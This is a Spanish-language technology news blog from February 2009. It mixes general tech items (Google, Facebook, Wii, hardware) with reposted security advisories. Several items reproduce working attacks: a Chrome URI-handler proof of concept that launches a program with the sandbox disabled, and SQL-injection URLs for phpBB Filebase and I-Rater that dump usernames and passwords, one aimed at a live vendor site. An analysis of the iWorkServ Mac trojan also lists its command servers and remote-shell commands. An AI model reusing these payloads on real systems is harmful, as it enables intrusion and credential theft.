Via abc.es
martes, 24 de febrero de 2009
Gmail se interrumpe momentáneamente
Via abc.es
jueves, 19 de febrero de 2009
Documentación en español de la suite mas completa para el análisis de la seguridad wireless
aircrack es una colección de herramientas para la auditoría de redes inalámbricas:
* airodump: programa para la captura de paquetes 802.11
* aireplay: programa para la inyección de paquetes 802.11
* aircrack: recuperador de claves estáticas WEP y WPA-PSK
* airdecap: desencripta archivos de capturas WEP/WPA
miércoles, 18 de febrero de 2009
¿Cuántos servidores son necesarios para que google busque adecuadamente?
En su blog personal, el señor Dean ha hecho público que para realizar una búsqueda con un rendimiento eficiente se utilizan alrededor de 1.000 máquinas, por una única búsqueda. El motivo de ello es conseguir la menor latencia posible entre la petición y la respuesta.
Dean comenta cómo ha avanzado Google en 10 años, desde 1999 hasta 2009. Según sus palabras por aquella época servían las respuestas a las búsquedas con una latencia de, normalmente, 1.000ms (1 segundo) y a comparación a día de hoy normalmente en tan sólo 200ms, una quinta parte de segundo, dando la sensación de ser casi instantánea. Dicha mejora ha sido posible gracias al cambio de la carga de los índices en memoria que hicieron hace unos años.
Así que ya sabéis, cada búsqueda en Google implica el uso de 1.000 máquinas más las que haya intermedias repitiendo la información.
via theinquirer
facebook cambia sus términos de servicio y usuarios se quejan
La red social por excelencia, Facebook, ha tenido que dar marcha atrás ante la imposición de sus exigentes términos del servicio: “Darás a Facebook una licencia y sublicencia internacional para usar, copiar, publicar, hacer stream, almacenar, retener, mostrar públicamente, transmitir, escanear, cambiar el formato, modificar, editar, encuadrar, traducir, extraer, adaptar, crear trabajos derivados y distribuirlo”.
Según han hecho público vuelven a los anteriores términos de uso mientras que “solucionan los problemas” que han levantado tantas quejas por parte de sus usuarios. Encuestas revelan que un 56% de los usuarios de la red social han presentado una queja ante los nuevos términos, lo que finalmente ha hecho a la empresa replantearse su estrategia.
En palabras de un representante de Facebook, no es la intención de Facebook apropiarse de tus contenidos, los contenidos siempre te pertenerán, algo que con los términos del servicio no queda nada.
Via theinquirer
AMD Phenom II X4 a 6,665 GHz
Tal y como nos cuentan en Noticias3D, tres frikis finlandeses han utilizado un sistema de refrigeracion basado en nitrógeno líquido para poner uno de esos procesadores a trabajar a una frecuencia de 6.665 MHz, lo que les ha permitido lograr todo tipo de records en distintos benchmarks.
Por ejemplo, han logrado 35.273 puntos en 3DMark06 (algo menos que el actual procesador más rápido, un Intel Core i7 965 EE), y además otra de las pruebas de rendimiento más importantes, Super Pi -en concreto, la prueba llamada 1M-, logró completarse en 10,7 segundos, lo que por lo visto es todo un logro teniendo en cuenta que los micros de Intel suelen ser inalcanzables en ese apartado.
Via theinquirer
domingo, 15 de febrero de 2009
Expertos recomiendan realizar el calentamiento antes de jugar Wii
Puede ser una propuesta muy divertida. Sin embargo, los médicos aconsejan realizarse al menos un chequeo médico y un importante precalentamiento físico antes de introducirse en el maravilloso mundo Wii. Un mal estado físico o un poco preparación pueden ser peligrosas a la hora de prender la consola de Nintendo.
La falta de una buena preparación física o un deficiente precalentamiento antes de jugar, puede provocar lesiones que son evitables. El diario tucumano La Gaceta resalta la afección muscular bautizada con el nombre de Wii Knee, que provoca dolor de rodillas ante una exposición muy prolongada delante de la consola.
Nintendo Wii es, en conjunto con la Sony Playstation 3, la consola de juegos más vendida en el mundo. Los juegos más populares son el programa de gimnasia Wii Fit y un programa de deportes denominado Wii Sports, en el cual se incluye el tenis, el béisbol y el golf, entre otros.
Via infobae
¿Cómo proteger el correo electrónico?
En la actualidad, si bien un hacker (aquel que accede a información en un sistema informático sin autorización) o un cracker (quien accede al haber robado la contraseña mediando el uso de softwares) son percibidos como una amenaza para la seguridad de una organización, no son las únicas. Entre las principales causas de vulnerabilidad se encuentra la ingeniería social, acaso una de las formas más utilizadas para violar una cuenta de correo electrónico.
Esta amenaza, si bien parece novedosa, no es más que el engaño para obtener información u otro beneficio; el clásico engaño que desde hace mucho tiempo conocemos como el cuento del tío.
El típico ejemplo que mejor ilustra esta problemática es el del llamado telefónico: “Buenas tardes, lo llamo de Microsoft. Veo que su nombre de usuario es maria_lopez122, pero no tiene configurada una “pregunta secreta” en su cuenta. Tuvimos un problema con la misma, alguien intentó utilizarla para cometer un delito y, a efectos de que la cuenta no sea desactivada, necesito que corrobore su contraseña…”.
Confianza ciega
En la práctica, una contraseña es frecuentemente compartida con colegas de la organización, personal del soporte técnico, familiares, amigos, etc. Como en todas las relaciones humanas, la confianza es un bien preciado que tiene su contrapartida en la traición. De esta forma, aquello que se percibía seguro, la contraseña más compleja, mejor lograda, puede ser conocida por individuos con intereses opuestos al dueño de la casilla de correo; una situación que puede provocar daños graves a una persona o a una compañía.
Contra el enfoque de los administradores de redes de generar estrategias de blindaje cada vez más sólidas, se perfeccionaron las herramientas de “ingeniería social” orientadas a vulnerar casillas de correo, sin la necesidad de hackear ni crackear. La ingeniería social no es sino el uso de la manipulación de las personas para que realicen actos o divulguen información confidencial.
En este sentido, la mejor o quizás única forma de proteger la privacidad del correo y del resto de la información es capacitar a las personas para que nunca revelen información confidencial a un extraño por más convincente que pueda parecer el pretexto. Por cierto, las medidas de seguridad tradicional siguen siendo válidas: cuidar las contraseñas, cambiarlas periódicamente, por ejemplo cada 90 días, y evitar utilizar información conocida por el entorno como fechas de nacimiento, direcciones físicas, nombres de familiares, mascotas, etc.
Es simple. La falta de conocimiento y capacitación en los recursos humanos puede determinar el fracaso, incluso contando con los sistemas de protección más avanzados. Un complemento recomendable es sumar la supervisión externa de profesionales especializados en seguridad informática, con experiencia en múltiples organizaciones y tecnologías, que brinden apoyo para monitorear la funcionalidad de los sistemas de seguridad y capacitar al personal interno.
En pocas palabras, la seguridad del correo electrónico y otros documentos digitales yace en gran medida en la habilidad de los usuarios para administrar sus contraseñas de manera segura y responsable, y de las compañías, de generar y comunicar claramente las políticas de seguridad en torno al uso de los sistemas, en donde circula uno de sus bienes más preciados, la información.
Alessio Aguirre-Pimentel
Director del Área Seguridad Informática e Informática Forense
FTI Consulting de Argentina
Via Infobae
sábado, 14 de febrero de 2009
Portátiles militares estadounidenses acaban en el mercado negro de Pakistán
Por 650 dólares se puede comprar un portátil militar como el de la imagen, en el mercado de Sitara de la ciudad de Peshawar, al noroeste de Pakistán, que se ha convertido en una zona peligrosa utilizada como ruta de suministro por las tropas de la OTAN que operan en la zona.
El portátil parece forma parte de un kit de diagnóstico de vehículos y almacena la identidad de numerosos militares y fallos de los vehículos que los estadounidenses mantienen en la guerra de Afganistán.
Un portavoz del Pentágono indicó que “las computadoras con información sensible normalmente no viajan en camiones a través de Pakistán”, aunque admitió que los vehículos de los contratistas civiles son atacados o saqueados con asiduidad.
Unos ataques y el riesgo potencial de que diversa información “llegue a manos equivocadas”, son el motivo de que la OTAN esté buscando rutas alternativas en una de las zonas más conflictivas del planeta.
Via theinquirer
Samsung produce GDDR5 a 7 GHz
El paso a procesos de fabricación de 50 nanómetros permite además, reducir el consumo de los chips a 1,35 voltios. Otra de las ventajas es la reducción de costes, aumentando la eficiencia de la producción hasta en un 100% frente a procesos de 60 nanómetros, señalan desde Samsung.
Los chips GDDR5 a 7GHz GDDR5 proporcionarán un ancho de banda máximo de 224/448 GB/s con interfaces de memoria de 256 y 512 bits respectivamente.
No se conoce los modelos de tarjetas gráficas de ATI o NVIDIA que utilizarán los módulos de Samsung, aunque se podrían incorporar a los próximos desarrollos de gama alta que llegarán a finales de año, señalan en X-Bit Labs.
En Samsung apuestan fuerte y junto a las nuevas GDDR5 para gráficas, se une la reciente validación de los primeros chips DRAM en procesos de 40 nanómetros, que abren el camino a la producción de memoria RAM de ultra-alto rendimiento DDR4.
Microsoft es demandadao por cobrar el Downgrade
Emma Alvarado invita a otros usuarios que estén en su misma situación para que se unan a la “class-action”, el procedimiento judicial de demanda colectiva iniciado.
Los abogados de la consumidora indican que muchos clientes que compraron PCs con Vista, optaron por “rebajarlo” a XP, ante los “numerosos problemas de Vista”, recalcan.
Ante las peticiones de XP, “Microsoft utilizó su monopolio exigiendo comprar Vista para a continuación hacer el downgrade”. Según la demanda “estas prácticas desleales violan las leyes comerciales del estado de Washington y las de protección del consumidor”.
Microsoft se enfrenta en el mismo tribunal a las demandas por el escándalo del Vista Capable, la presunta publicidad engañosa del preparado para Vista, que podría suponer a la compañía un cargo de 8.520 millones de dólares.
Via theinquirer
La guerra de las discográficas contra el p2p ha sido inúil
Lo reconoce el antiguo presidente de la Federación Internacional de la Industria Fonográfica (IFPI) y ex director de EMI / Virgin Norway.
Eirik Johansen reconoce en una entrevista para el Norway`s Dagbladet, que la lucha contra las descargas en Internet por parte de la industria musical ha demostrado ser inútil:
"Lo principal es que toda una generación ya viola el copyright, y lo único que podemos hacer es buscar mejores soluciones".
"Nunca nadie ha ganado una batalla luchando contra una nueva tecnología".
Johansen no obstante ve con optimismo la industria musical, destacando el crecimiento producido en el mercado de conciertos en vivo y mostrando especial entusiasmo por los nuevos modelos de hacer dinero a partir de la música:
"Me siento muy optimista. Se ha producido una revolución, y a raiz de ello, todo es ahora muy caótico, aunque existe un espíritu empresarial que es a la vez sano y emocionante. No sabemos donde estará la industria en un año o dos, pero estoy convencido de que el futuro parece prometedor. "
Vía BandaAncha
Por qué el 92% de las vulnerabilidades críticas en Windows minimizarían su impacto si no se usase la cuenta de administrador
BeyondTrust ha publicado un estudio pormenorizado de todas las vulnerabilidades publicadas por Microsoft en 2008. Ha concluido que el 92% de las vulnerabilidades críticas y el 69% de todas (críticas o no) serían menos graves, o tendrían un impacto mucho menor, si fuesen aprovechadas por un atacante pero la víctima no fuese administrador. Cuando un atacante aprovecha una vulnerabilidad de ejecución de código en un programa que está siendo usado por un administrador, éste código hereda sus permisos y el atacante podrá campar a sus anchas (como el usuario) en el sistema una vez explotado el fallo. En un 92% de los casos, según el informe, se hubiese limitado considerablemente la gravedad del asunto.
Desde Hispasec siempre se ha recomendado evitar la cuenta administrador, es el principal consejo para los usuarios de sistemas operativos en general y los de Windows en particular. Esta es la primera capa de seguridad con la que se debe proteger un usuario. Un "administrador" está precisamente para "administrar", y son muy pocas veces las que un usuario utiliza su sistema para realizar modificaciones importantes. La mayor parte del tiempo lee correo o navega, actividad esta última que conlleva un importante riesgo, sea con el navegador que sea. Esta irresponsable actitud de usuario administrador perpetuo está heredada de los tiempos de Windows 9x. No tenía sistema de usuarios local real, ni soportaba NTFS, con lo que no se podían establecer permisos por usuarios. Con XP, por fin, Microsoft permitía la creación de un usuario inicial distinto al administrador para el uso del sistema, pero lo incluía por defecto al grupo administradores y por tanto no lo protegía ni limitaba en absoluto.
El otro 8%
El informe no explica por qué el impacto de tantas vulnerabilidades es susceptible a la cuenta bajo la que se exploten. ¿Por qué no nos protege del 100% de las vulnerabilidades críticas el hecho de trabajar como usuario sin privilegios? Pues porque el resto, el 8% de vulnerabilidades se pueden clasificar básicamente en tres:
* Las que permiten revelación de información. Estas suelen ser independientes del usuario bajo el que se explota la vulnerabilidad.
* Las que afectan a servicios de sistema que corren siempre bajo cuentas privilegiadas. Los servicios especiales de sistema corren normalmente bajo la cuenta SYSTEM. Si un atacante aprovecha un fallo en estos servicios desde el exterior, no hay nada que el usuario pueda hacer para evitarlo excepto intentar precisamente que el servicio no esté accesible para cualquiera. Hay que recordar que ya hicieron un trabajo importante de limitación de cuentas de servicio cuando apareció XP. En 2000 todos los servicios trabajaban con los máximos privilegios. En XP y 2003, no.
* Las elevaciones de privilegios. Evidentemente, este tipo de vulnerabilidades permiten precisamente saltar de una cuenta sin privilegios a otra con mayor capacidad de actuación sobre el sistema. Si se trabaja con cuenta limitada, es una de las mayores preocupaciones. Si se trabaja como administrador, estas vulnerabilidades no suelen tienen impacto (excepto si logran privilegios de SYSTEM, ligeramente superiores a los del propio Administrador). Hoy en día, las vulnerabilidades de elevación de privilegios son poco valoradas por los atacantes (en especial los creadores de malware) porque presuponen (y presuponen bien) que su víctima será administrador.
¿Windows un 92% más seguro?
Significa que el trabajar con cuentas con privilegios menos elevados ayudaría a que el sistema fuese un 92% más seguro? Desgraciadamente no, pero sin duda ayudaría.
Trabajar como usuario con pocos privilegios no es la panacea. Trabajar como usuario raso en XP o 2000 con cierto software puede llegar a ser incómodo, incluso para usuarios experimentados (y casi siempre esto es responsabilidad de los propios programadores, que no suelen tenerlo en cuenta). Es necesario tener conocimientos sobre permisos, privilegios, NTFS, derechos, herencias, grupos... Por si fuera poco, con ánimo de no complicar al usuario, Windows XP Home Edition esconde deliberadamente la pestaña de seguridad para poder cambiar los permisos, a no ser que se trabajara en modo a prueba de fallos. En otros sistemas operativos resulta más sencillo, porque los programadores siempre han supuesto que su usuario no iba a gozar de todos los permisos.
El problema es, como de costumbre, la educación del usuario ante una estructura tan compleja como hoy en día es un sistema operativo. Estamos tan mal acostumbrados que si un usuario de cualquier sistema operativo (distinto a Windows) se convierte en víctima del exploit de una vulnerabilidad, y por ello el sistema queda totalmente comprometido, lo primero que preguntamos es si estaba trabajando como root. Si es así, inmediatamente la mayor parte de la responsabilidad cae del lado del usuario (abstrayéndonos de la responsabilidad del software). Se entiende como una especie de castigo justo por no conocer y limitar convenientemente su entorno de trabajo, o por despiste. En Windows, si un usuario es víctima de un malware que se le ha colado a través del navegador, y esta víctima trabaja como administrador (lo más habitual) el problema se achaca directamente al sistema operativo o al navegador y sus continuos fallos. No solemos pararnos a pensar en que el usuario, tampoco en este caso, conoce realmente su entorno de trabajo o no se le han proporcionado la facilidades para hacerlo, y por eso no lo ha limitado convenientemente. Limitándolo, si bien no se reduciría el número de fallos, sí se degradará considerablemente su impacto, como bien recuerda el informe.
Más Información:
Reducing the Threat from Microsoft Vulnerabilities: 92% of Critical
Vulnerabilities can be Mitigated by Removing Admin Rights
http://www.beyondtrust.com/documentation/whitePapers/wp_VulnerabilityReport.pdf
viernes, 13 de febrero de 2009
Recompensa de 250 mil dólares a quien ofrezca información acerca de los creadores de conficker
Conficker, también conocido como Downadup, continúa propagándose las últimas semanas a millones de ordenadores, incluido parte del ejército francés.
Los cazas de la marina francesa no pudieron descargar sus planes de vuelo después de que las bases de datos se vieran infectadas por el virus.
George Stathakopoulos, uno de los responsables de seguridad de Microsoft declara que la intención de la compañía es la de controlar la amenaza que representa Conflicker y dar un ejemplo con el creador del mismo.
Se especula que actualmente hay 12 millones de ordenadores infectados por Conficker o Downaup.
Via hispamp3
sábado, 7 de febrero de 2009
Las extensiones para Google Chrome llegarán en mayo
Concretamente será el 27 de mayo durante una sesión de Google I/O. "Aprende cómo Google Chrome permite de forma fácil escribir extensiones usando las tecnologías web que ya conoces. En la charla hablaremos de los principios básicos del sistema de extensiones (distribución, empaquetado, instalación y actualizaciones) así como de los diferentes APIs para realzar con el navegador".
Las primeras extensiones que estarán disponibles:
- Bookmarking/navigation tools: Delicious Toolbar, Stumbleupon, web-based history, new tab page clipboard accelerators
- Content enhancements: Skype extension (clickable phone numbers), RealPlayer extension (save video), Autolink (generic microformat data - addresses, phone numbers, etc.)
- Content filtering: Adblock, Flashblock, Privacy control, Parental control
- Download helpers: video helpers, download accelerators, DownThemAll, FlashGot
- Features: ForecastFox, FoxyTunes, Web Of Trust, GooglePreview, BugMeNot
Via Hispamp3
Simple Machines Forum Password Reset Security Bypass Vulnerability
Bugtraq ID: | 33219 |
Class: | Access Validation Error |
CVE: | |
Remote: | Yes |
Local: | No |
Published: | Jan 12 2009 12:00AM |
Updated: | Feb 06 2009 11:18PM |
Credit: | Xianur0 |
Vulnerable: | Simple Machines SMF 1.1.5 Simple Machines SMF 1.1.5 Simple Machines SMF 1.1.4 Simple Machines SMF 1.1.3 Simple Machines SMF 1.1.2 Simple Machines SMF 1.1.1 Simple Machines SMF 1.1 rc3 Simple Machines SMF 1.1 rc3 Simple Machines SMF 1.1 rc2 Simple Machines SMF 1.1 rc1 Simple Machines SMF 1.1 final Simple Machines SMF 1.0.13 Simple Machines SMF 1.0.13 Simple Machines SMF 1.0.12 Simple Machines SMF 1.0.12 Simple Machines SMF 1.0.11 Simple Machines SMF 1.0.10 Simple Machines SMF 1.0.9 Simple Machines SMF 1.0.8 Simple Machines SMF 1.0.8 Simple Machines SMF 1.0.7 Simple Machines SMF 1.0.6 Simple Machines SMF 1.0.5 Simple Machines SMF 1.0.4 Simple Machines SMF 1.0.3 Simple Machines SMF 1.0.2 Simple Machines SMF 1.0.1 Simple Machines SMF 1.0 -beta5p Simple Machines SMF 1.0 -beta4p Simple Machines SMF 1.0 -beta4.1 Simple Machines Simple Machines Forum 1.1.5 Simple Machines Simple Machines Forum 1.1.4 Simple Machines Simple Machines Forum 1.1.3 Simple Machines Simple Machines Forum 1.1.2 Simple Machines Simple Machines Forum 1.1.1 |
| |
Not Vulnerable: | Simple Machines Simple Machines Forum 1.1.6 Simple Machines Simple Machines Forum 1.0.14 |
Attackers can exploit this issue via a browser.
The following exploit code is available:
http://www.securityfocus.com/data/vulnerabilities/exploits/33219.pl
Google Chrome 1.0.154.46 (ChromeHTML://) Parameter Injection PoC
chromehtml:"%20--renderer-path="calc"%20--no-sandbox
Disabling sandbox does matter :)
Tested with Google Chrome Chrome 1.0.154.46 on Win XP/Vista and IE6/IE7 and it works ...
Full PoC:
<title>Chrome URI Handler Remote Command Execution PoC</title>
<h3>This is a test</h3>
<iframe src="chromehtml:%22%20--renderer-path=%22calc%22%20--no-sandbox" width="0" height="0"></iframe>
# milw0rm.com [2009-01-30]
viernes, 6 de febrero de 2009
phpBB Filebase Module 'filebase.php' SQL Injection Vulnerability
Ejemplo:
http://www.example.com/filebase.php?d=1&id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,char(58),user_password),12,13,14/**/FROM/**/phpbb_users/*
jueves, 5 de febrero de 2009
Rogue: falsos antivirus
El video muestra cómo un rogue realiza una exploración falsa con el fin de engañar al usuario y que instale el falso antivirus, dividido en dos partes: cómo ocurre la infección y que debería haber hecho el usuario para no infectarse, más allá del uso de un antivirus capaz de detectar la amenaza.
Video
Virus para Mac OS X distribuido por redes P2P, a través de software ilegal - iWorkServ
Sistemas afectados
* Mac OS X
Descripción
Se está distribuyendo una "copia pirata" del software iWork2009 a través de redes de intercambio de archivos P2P, la cual ha sido infectada con el troyano iWorkServ
Actualizado 29/01/2009: Se han descubierto nuevas versiones del troyano, en las copias ilegales de programas como Adobe Photoshop CS4.
Solución
Estas infecciones se pueden minimizar utilizando software legítimo de fabricantes y distribuidores de confianza. Por el contrario si el software que se utiliza tiene procedencia "dudosa" se corre el riesgo de instalar además del software deseado, alguno otro programa malicioso.
Si ya se está infectado, seguir los pasos que nos indica INTECO-CERT en el apartado de desinfección del virus.
Detalle
Han introducido en las redes P2P una copia ilegal del programa iWorks2009, con un virus dentro. Este virus es capaz de robar información, como contraseñas, cuentas bancarias, números de tarjetas de crédito… y es capaz de enviarla por Internet.
Se han difundido, según algunas fuentes, en torno a 20.000 copias del archivo infectado, lo que ha provocado una infección considerable en los sistemas MAC, esto implica que NINGÚN SISTEMA OPERATIVO ESTA LIBRE DE ATAQUES.
Este tipo de virus que funcionan de esta forma se denominan troyanos, y algunos de ellos forman redes de “Zombies” o “botnets”, que son usadas para mandar correo masivo (Spam), robar datos o atacar a otros ordenadores.
Este virus ha puesto de manifiesto el riesgo de seguridad de utilizar software pirata descargado de las redes de intercambio P2P. El software procedente de redes P2P puede contener un virus de este tipo, y es el propio usuario el que infecta su ordenador al instalarlo. Esta forma de infección no necesita aprovecharse de errores en el sistema operativo, navegador u otros programas, sino que es el propio usuario el que provoca la infección a través de la descarga de software de procedencia dudosa.
REFERENCIAS:
* Hispasec (open a new window)
* Segur-info (open a new window)
* CA (open a new window)
* Sophos (open a new window)
* Symantec (open a new window)
* Trend Micro (open a new window)
* Intego (open a new window)
iWorkServ: Troyano para MAC OSX que abre una puerta trasera y hace al equipo comprometido actuar como un servidor P2P.
# Peligrosidad: 1 - Mínima
Nombre completo del virus: Backdoor.MAC/iWorkServ@Otros
# Tipo de código: Backdoor Programa que permite a otro usuario acceder de forma no autorizada al ordenador infectado.
#
Plataformas afectadas: MAC Macintosh, pudiendo afectar a los diferentes sistemas operativos de la familia Mac OS X
# Capacidad de residencia permanente : No. No tiene capacidad para ejecutarse automáticamente en cada reinicio del sistema.
# Tamaño (bytes): 413.568
# Alias:
* OSX_KROWI.A (Trend Micro)
* OSX/iWorkS-A (Sophos)
* OSX/IWService (McAfee)
* OSX.Iservice (Symantec)
* Backdoor:OSX/iWorkServ.A (F-Secure)
* OSX/Krowi.A (Computer Associates)
* OSX.Trojan.iServices.A (Intego)
Propagación
Capacidad de autopropagación: No
Carece de rutina propia de propagación. Puede llegar al sistema de las siguientes maneras:
iWork es un conjunto de aplicaciones de productividad creado por Apple Inc. La versión de prueba legítima puede ser descargada de:
* http://www.apple.com/iwork/download-trial/
Sin embargo, hay copias no legítima de iWork2009 en sitios de compartición de ficheros. Algunas de estas copias ilegítimas contienen un troyano malicioso con funcionalidades de P2P.
Infección/Efectos
Cuando iWorkServ se ejecuta, realiza las siguientes acciones:
El troyano usa un fichero llamado iWorkServices que es parte del paquete instalador. Este fichero es el que es detectado por F-Secure como iWorkServ.A .
El fichero se instala en:
* /System/Library/StartupItems/iWorkServices
...y lo hace con permisos de lectura, escritura y ejecución.
Al ejecutarse, el troyano, comprueba si se esta ejecutando como Administrador usando las funciones de la API "_geteuid" y "_getpwuid" y luego comprobando si la salida es "root".
Si no dispone de estos permisos, simplemente finaliza su ejecución.
En cambio, si se esta ejecutando como root, el siguiente paso es comprobar si el fichero de ejecución tiene el nombre "iWorkServices". Si no es asi, el troyano borrará el fichero "/tmp/.iWorkServices".
A continuación el troyano crea los siguientes ficheros:
* /System/Library/StartupItems/iWorkServices/iWorkServices
* /System/Library/StartupItems/iWorkServices/StartupParameters.plist
* /usr/bin/iWorkServices
Los ficheros con nombre iWorkServices son copias de sí mismo.
El fichero "StartupParameters.plist" tiene los siguientes contenidos:
{ Description = "iWorkServices";
Provides = ("iWorkServices");
Requires = ("Network");
OrderPreference = "None"; }
Efectos
El troyano puede intentar conectarse con las siguientes IPs:
* 69.92.177.146:59201
* qwfojzlk.freehostia.com:1024
Una vez instalado y en ejecución , un atacante remoto podría descargar y/o ejecutar ficheros usando los siguientes comandos P2P:
* banadd
* banclear
* clear
* get
* httpget
* httpgeted
* leafs
* nodes
* p2pihist
* p2pihistsize
* p2plock
* p2pmode
* p2ppeer
* p2ppeerport
* p2ppeertype
* p2pport
* p2punlock
* platform
* rand
* rshell
* script
* sendlogs
* set
* shell
* sleep
* socks
* system
* uid
* unknowns
* uptime
Contramedidas
Desinfección
*
Con un antivirus actualizado, localice todas las copias del virus en el disco duro de su MAC. Si no dispone de antivirus, visite nuestra página de Antivirus gratuitos .
Elimine los siguientes ficheros o directorios:
o /System/Library/StartupItems/iWorkServices/iWorkServices
o /System/Library/StartupItems/iWorkServices/StartupParameters.plist
o /usr/bin/iWorkServices
o /System/Library/StartupItems/iWorkServices
*
Elimine todos los archivos temporales del ordenador, incluidos los archivos temporales del navegador, vacíe también la Papelera de reciclaje.
*
Reinicie su ordenador y explore todo el disco duro con un antivirus para asegurarse de la eliminación del virus. Si desactivó la restauración del sistema, recuerde volver a activarla. Cree un punto de restauración, le resultará útil para recurrir a él en caso de posibles infecciones o problemas en el futuro.
Via Inteco
La nueva versión de Firefox soluciona seis vulnerabilidades
Brevemente, las vulnerabilidades de Firefox clasificadas por criticidad son:
Bajas:
* Las directivas con las que las páginas indican que no deben ser cacheadas no eran aplicadas.
* Se podían leer las cookies HTTPOnly con XMLHttpRequest.
Moderadas:
* Elevación de privilegios en Chrome a través de ficheros .desktop.
Altas:
* Robo de ficheros locales con SessionStore.
* Cross-site scripting usando el método XBL y window.eval.
Críticas:
* De nuevo problemas con JavaScript y evidencias de posibilidad de ejecución de código.
Otra vez el motor JavaScript como el origen de la mayoría de problemas de seguridad graves en Firefox. Al menos, no se tiene constancia de que los fallos de seguridad hayan sido aprovechados de forma regular por atacantes, ni de la existencia de exploits públicos.
Aunque Thunderbird sufre de cuatro de estos últimos problemas de seguridad, todavía no se ha publicado la versión que los soluciona. Habitualmente su publicación se retrasa varios días, sin motivo aparente. En este caso se espera que la versión 2.0.0.21 del cliente de correo solvente los fallos, pero no se sabe cuándo verá la luz.
Más Información:
Mozilla Foundation Security Advisories
http://www.mozilla.org/security/announce/
Via hispasec
martes, 3 de febrero de 2009
MySpace expulsa a 90.000 delicuentes sexuales de su red
La cifra, otorgada por MySpace al fiscal general del estado de Connecticut Richard Blumenthal, representó más del doble del número que el portal previó cuando lanzó la campaña sobre amenazas online para menores.
"Esta terrible revelación representa una prueba convincente de que en los sitios de redes sociales continúan abundando predadores sexuales", dijo Blumenthal en un comunicado.
Los delincuentes fueron hallados a través de direcciones de correo electrónico y nombres ocultos requeridos por las autoridades.
Blumenthal advirtió que probablemente haya aún miles de delincuentes sexuales más escondidos en sitios de redes sociales utilizando nombres y direcciones de correo no registradas.
Via lavanguardia
I-Rater Basic(messages.php) SQL-injection.
Publicado antes de: 02/02/2009 - Última modificación: 03/02/2009
Gravedad: Alta
Tipo de Pérdida:
* Protección de seguridad
* Confidencialidad
* Integridad
* Disponibilidad
* Otra protección de seguridad
Enlaces:
* http://www.securityfocus.com/bid/32912
Fuente: BID Nombre: 32912
* http://www.milw0rm.com/exploits/7514
Fuente: MILW0RM Nombre: 7514
* http://secunia.com/advisories/33213
Fuente: SECUNIA Nombre: 33213 [Asesor]
Productos Afectados:
* I-Rater - i-rater_basic - _nil_
#######################################################
I-Rater Basic(messages.php) SQL-injection.
#######################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
#[!] Script Name: I-Rater Basic
#[!] Home Page: http://www.i-rater.com
#[!] Google_Dork: N/A
###################################################
#[~] Example:
http://localhost/Path/messages.php?idp=[exploit]
#[~]Exploit:
-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
#[!] Live Demo
http://www.i-rater.com/basic/messages.php?idp=-9999+union+all+select+1,2,3,concat(username,char(58),password)KHG,5,6,7,8+from+admin--
#[!] Note
To see the information go View Sources/Search "large.php?id=" ;).
##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################
# milw0rm.com [2008-12-18]
http://alerta-antivirus.inteco.es/seguridad/busca_vulns.php?vervuln=200806017
http://www.milw0rm.com/exploits/7514
Gmail agrega una prueba matematica para evitar el envío erróneo de emails
Como parte de su cruzada para atraer usuarios a su servicio Gmail, la compañía de búsquedas por internet ha introducido decenas de prestaciones, incluyendo una que pasado un tiempo obliga al usuario a resolver un problema matemático antes de enviar el correo, dándole tiempo para pensarlo dos veces.
Debido a que Google obtiene dinero cada vez que un usuario de correo electrónico hace un clic en los anuncios, está potenciando su servicio de correo electrónico para aumentar la publicidad y quitar un porcentaje del mercado a Yahoo.
Las visitas únicas a sitios de Google aumentaron un 32 por ciento a nivel mundial, lo que es más de 775 millones visitas durante el año pasado, de acuerdo a comScore, que recopila ese tipo de información.
Leer mas
lunes, 2 de febrero de 2009
La Universidad de Stanford desarrolla un sistema de corrección de direcciones de email
Un problema que podría tener pronto los días contados. Un grupo de investigadores de la Universidad de Stanford ha desarrollado un sistema que corrige mediante diversos algoritmos de tecnología semántica, que reconoce y corrige en tiempo real frases y relaciones entre palabras en lugar de simplemente reconocer los caracteres introducidos de forma individual. Por ahora, el sistema ha sido probado por 6.000 personas con resultados positivos.
Aún se desconocen las empresas que implementarán la tecnología en sus servicios de correo electrónico pero los investigadores han avanzado que se han mostrado más interesadas las organizaciones para incluirlo en el trabajo y aumentar la eficiencia.
Via noticiasdot